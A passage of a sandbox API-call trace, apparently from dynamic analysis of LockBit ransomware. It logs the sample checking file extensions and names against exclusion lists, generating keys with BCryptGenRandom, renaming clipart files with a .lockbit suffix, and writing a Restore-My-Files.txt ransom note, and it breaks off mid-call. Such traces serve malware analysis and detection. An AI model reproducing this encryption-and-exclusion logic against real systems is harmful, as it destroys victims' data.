lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.847] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.847] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304861.WMF") returned 1 [0157.848] lstrcmpiW (lpString1="ntldr", lpString2="J0304861.WMF") returned 1 [0157.848] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304861.WMF") returned 1 [0157.848] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304861.WMF") returned -1 [0157.848] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304861.WMF") returned -1 [0157.848] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304861.WMF") returned 1 [0157.848] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304861.WMF") returned -1 [0157.848] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.848] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF") returned=".WMF" [0157.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.848] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.848] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.849] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.849] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF.lockbit") returned 72 [0157.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304861.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0157.854] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.854] malloc (_Size=0x40068) returned 0x1ff1e60 [0157.854] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11512) returned 1 [0157.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0157.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0157.855] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0157.858] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.858] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.858] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.859] free (_Block=0x1fa2ed8) [0157.859] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304861.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.859] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.859] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.859] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4f8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304875.WMF", cAlternateFileName="")) returned 1 [0157.859] lstrcmpiW (lpString1=".", lpString2="J0304875.WMF") returned -1 [0157.859] lstrcmpiW (lpString1="..", lpString2="J0304875.WMF") returned -1 [0157.859] PathFindExtensionW (pszPath="J0304875.WMF") returned=".WMF" [0157.860] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.860] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.861] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.861] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.862] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304875.WMF") returned 1 [0157.862] lstrcmpiW (lpString1="ntldr", lpString2="J0304875.WMF") returned 1 [0157.862] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304875.WMF") returned 1 [0157.862] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304875.WMF") returned -1 [0157.862] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304875.WMF") returned -1 [0157.862] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304875.WMF") returned 1 [0157.863] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304875.WMF") returned -1 [0157.863] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.863] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF") returned=".WMF" [0157.863] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.863] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.863] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.864] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.864] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF.lockbit") returned 72 [0157.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304875.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.870] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.870] malloc (_Size=0x40068) returned 0x3df0008 [0157.870] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20366) returned 1 [0157.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.871] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.874] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.874] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.874] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.875] free (_Block=0x1fa2ed8) [0157.875] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.875] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.876] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x29c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309480.JPG", cAlternateFileName="")) returned 1 [0157.876] lstrcmpiW (lpString1=".", lpString2="J0309480.JPG") returned -1 [0157.876] lstrcmpiW (lpString1="..", lpString2="J0309480.JPG") returned -1 [0157.876] PathFindExtensionW (pszPath="J0309480.JPG") returned=".JPG" [0157.876] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.876] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.876] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.877] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.877] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.878] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.878] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309480.JPG") returned 1 [0157.878] lstrcmpiW (lpString1="ntldr", lpString2="J0309480.JPG") returned 1 [0157.878] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309480.JPG") returned 1 [0157.878] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309480.JPG") returned -1 [0157.878] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309480.JPG") returned -1 [0157.878] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309480.JPG") returned 1 [0157.879] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309480.JPG") returned -1 [0157.879] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.879] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG") returned=".JPG" [0157.879] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.879] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.879] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.879] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.880] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.880] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.880] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG.lockbit") returned 72 [0157.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309480.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0157.881] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.881] malloc (_Size=0x40068) returned 0x3d70450 [0157.881] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10692) returned 1 [0157.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0157.882] LoadLibraryA 